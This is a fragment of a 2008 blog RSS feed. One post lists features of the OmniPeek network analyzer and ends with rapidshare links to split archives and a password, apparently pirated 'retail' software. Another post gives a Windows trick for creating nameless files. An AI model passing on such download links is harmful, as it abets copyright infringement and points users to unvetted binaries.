<p>* Real-time Application Analysis:<br />
The Omni Expert collects network traffic into conversations. OmniPeek is able to aggregate these conversations by application and rate user satisfaction.</p>
<p>* Visual Expert:<br />
Visual Expert includes a wealth of accessible tools to perform detailed analysis of conversation flows. These include the Packet Visualizer which shows the interactive requests and responses between the client and the server, payload reconstruction which can show the contents of the flow, a wide range of new conversation-oriented graphs including tcptrace.</p>
<p>* Real-Time Expert Analysis:<br />
OmniPeek displays Expert System diagnoses by conversation pair, so you can instantly identify where problems are occurring on the network. Other companies’ analyzers hide this information, listing their alarms by OSI layer. The Expert EventFinder in OmniPeek provides descriptions, and possible causes and remedies for each of the problem conditions the Expert identifies. The Network Policy Violation Detection allows the user to create, edit, save and reload named descriptions of a particular network-its participants and their expected behavior-for the Expert to use in detecting Network Policy violation events.</p>
<p>* Expert Mapping:<br />
The OmniPeek Expert Peer Map shows all communicating nodes within your network and is drawn as a vertically-oriented ellipse, able to grow to the size necessary. Reading the Peer Map is easy; the thicker the line between nodes, the greater the traffic; the bigger the dot, the more traffic through that node. The number of nodes displayed can also be limited to the busiest and/or active nodes, or to any OmniPeek filters that may be in use.</p>
<p>* Wireless Network Security &#8211; WPA/PSK Support:<br />
In addition to WEP (Wired Equivalent Privacy) support, OmniPeek allows users to specify the WPA (Wi-Fi Protected Access) pre-shared key set for their network now. This means that OmniPeek will decode and decrypt an encrypted packet with your user-defined WPA keys, allowing application layer analysis.</p>
<p>* On-the-Fly Filters:<br />
You shouldn’t have to stop your analysis to change what you’re looking at it. OmniPeek enables you to create filters and apply them immediately.</p>
<p>* Global Real-Time Troubleshooting:<br />
Through the OmniPeek interface, OmniAnalysis extends real-time troubleshooting to network segments around the world, delivering expert network analysis, detailed node, protocol, and network summary statistics, and even packet decoding, on multiple segments, by multiple users, in real time.</p>
<p>* Enhanced Voice Option:<br />
WildPackets Enhanced Voice Option – provides users with the visibility and analysis they need in order to keep VoIP applications and non-voice applications running optimally on the network. Through the Enhanced Voice Option, users gain access to a wealth of detailed call quality statistics, graphical representations of the voice traffic and detailed diagnostic information. Specific signaling and call playback capabilities complete the enhanced VoIP analysis capabilities.</p>
<p>Features and Benefits:</p>
<p>* Real-Time Troubleshooting &amp; VoIP Call Summary:<br />
OmniPeek Enterprise with Enhanced Voice Option is the only network analyzer offering Ethernet, Wireless, Gigabit, WAN, and VoIP diagnostics in real-time. The Expert view provides in-depth analysis of latency, throughput, and numerous network problems in a conversation-centered display. Many of the test elements have user-defined settings and thresholds, allowing you to fine-tune the Expert System to suit your network environment.</p>
<p>* VoIP Signaling Analysis:<br />
OmniPeek Enterprise with Enhanced Voice Option supports multiple VoIP signaling protocols including SIP, H.323, MGCP, Megaco, SCCP (Skinny v3.0.3), NCS, TGCP, SIPT, C-SIP and more. OmniPeek Enterprise with Enhanced Voice Option associates all the signaling (including RTCP status reports) and voice streams (RTP) on a per call basis and provides a flow of the signaling messages and endpoints that participate in the call. This includes measuring call setup durations and providing a Call Detail Record (CDR) for each call.</p>
<p>* Media Plane Analysis:<br />
The media plane analysis looks at the packet-level details of RTP and RTCP streams, and evaluates packet inter-arrival time, variation, packet loss, jitter and other parameters. Further, OmniPeek Enterprise with Enhanced Voice Option identifies packets that cause problems like duplicate packets and out of sequence packets. OmniPeek Enterprise with Enhanced Voice Option also provides non-intrusive voice quality monitoring by evaluating Mean Opinion Score (passive MOS) in real-time (based on the ITU standard).</p>
<p>* VoIP Reports and Network Statistics:<br />
OmniPeek Enterprise with Enhanced Voice Option aggregates statistics and measurements of all active sessions to give a complete picture of the VoIP network status. OmniPeek Enterprise with Enhanced Voice Option provides the number of opened calls per signaling type, number of opened media channels and the network throughput of the RTP, RTCP and signaling links. It also reports statistics on jitter, packet loss, and bandwidth.</p>
<p>* Subjective VoIP Quality &#8211; Variable Jitter Buffer Playback:<br />
In addition to objective VoIP measurements, OmniPeek Enterprise with Enhanced Voice Option enables users to evaluate voice quality subjectively by using the call playback feature. This feature also allows users to vary the size of the jitter buffer. For instance, when capturing VoIP close to the listener, one can determine if a lower jitter buffer and thus lower delay in delivering voice to the handset, still delivers an acceptable level of quality.</p>
<p>* Passive MOS, R-Factor, and RTD Measurements:</p>
<p>http://rapidshare.com/files/81323520/WildPackets_OmniPeek_v5.part1.rar</p>
<p>http://rapidshare.com/files/81335027/WildPackets_OmniPeek_v5.part2.rar</p>
<p>OmniPeek Enterprise with Enhanced Voice Option provides voice quality measurement over live calls for Passive MOS, R-Factor, and RTD.Rar pass: masassali</p>
<p>mirror</p>
<p>http://rapidshare.com/files/50095149/zopev5.part1.rar</p>
<p>http://rapidshare.com/files/50089122/zopev5.part2.rar</p>
<p>http://rapidshare.com/files/50089695/zopev5.part3.rar</p>
<p>http://rapidshare.com/files/50112510/zopev5.part4.rar</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/6/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/6/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/6/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=6&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/08/wildpackets-omnipeek-enterprise-with-enhanced-voice-option-v50-retail/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>Create Folders And Files With (NO Name)</title>
		<link>http://redglue.wordpress.com/2008/05/03/create-folders-and-files-with-no-name/</link>
		<comments>http://redglue.wordpress.com/2008/05/03/create-folders-and-files-with-no-name/#comments</comments>
		<pubDate>Sat, 03 May 2008 10:12:03 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[Hacks]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=3</guid>
		<description><![CDATA[

This trick will allow you to create files and folders without any name.
Just follow the following steps:
1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.
Note: Type the numbers 0160 from the numpad, that is, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=3&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><div class="entry">
<div class="snap_preview">
<p><span style="color:#333333;">This trick will allow you to create files and folders without any name.</span></p>
<p><span style="color:#333333;">Just follow the following steps:<br />
1.Select any file or folder.<br />
2.Right click on it, press rename or simply press F2.<br />
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.</span></p>
<p><span style="color:#333333;">Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys.</span></p>
<p><span style="color:#333333;">4.Press Enter and the nameless file or folder will be created.</span></p>
<p><span style="color:#333333;">Reason: The file or folder that seems nameless is actually named with a single space.</span></p>
<p><span style="color:#333333;">But what if you want to create another nameless file or folder in the same directory ?</span></p>
<p><span style="color:#333333;">For this you will have to rename the file with 2 spaces. Just follow these steps below:</span></p>
<p><span style="color:#333333;">1.Select file, press F2.<br />
2.Hold alt key and type 0160 from the numpad.<br />
3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.<br />
4.Press enter and you will have second nameless file in the same directory.<br />
5.Repeat step 3 to create as many nameless files or folders in the same directory.</span></p>
<p><span style="color:#333333;">(we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)</span></p>
</div>
</div>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=3&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/03/create-folders-and-files-with-no-name/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
	</channel>
</rss>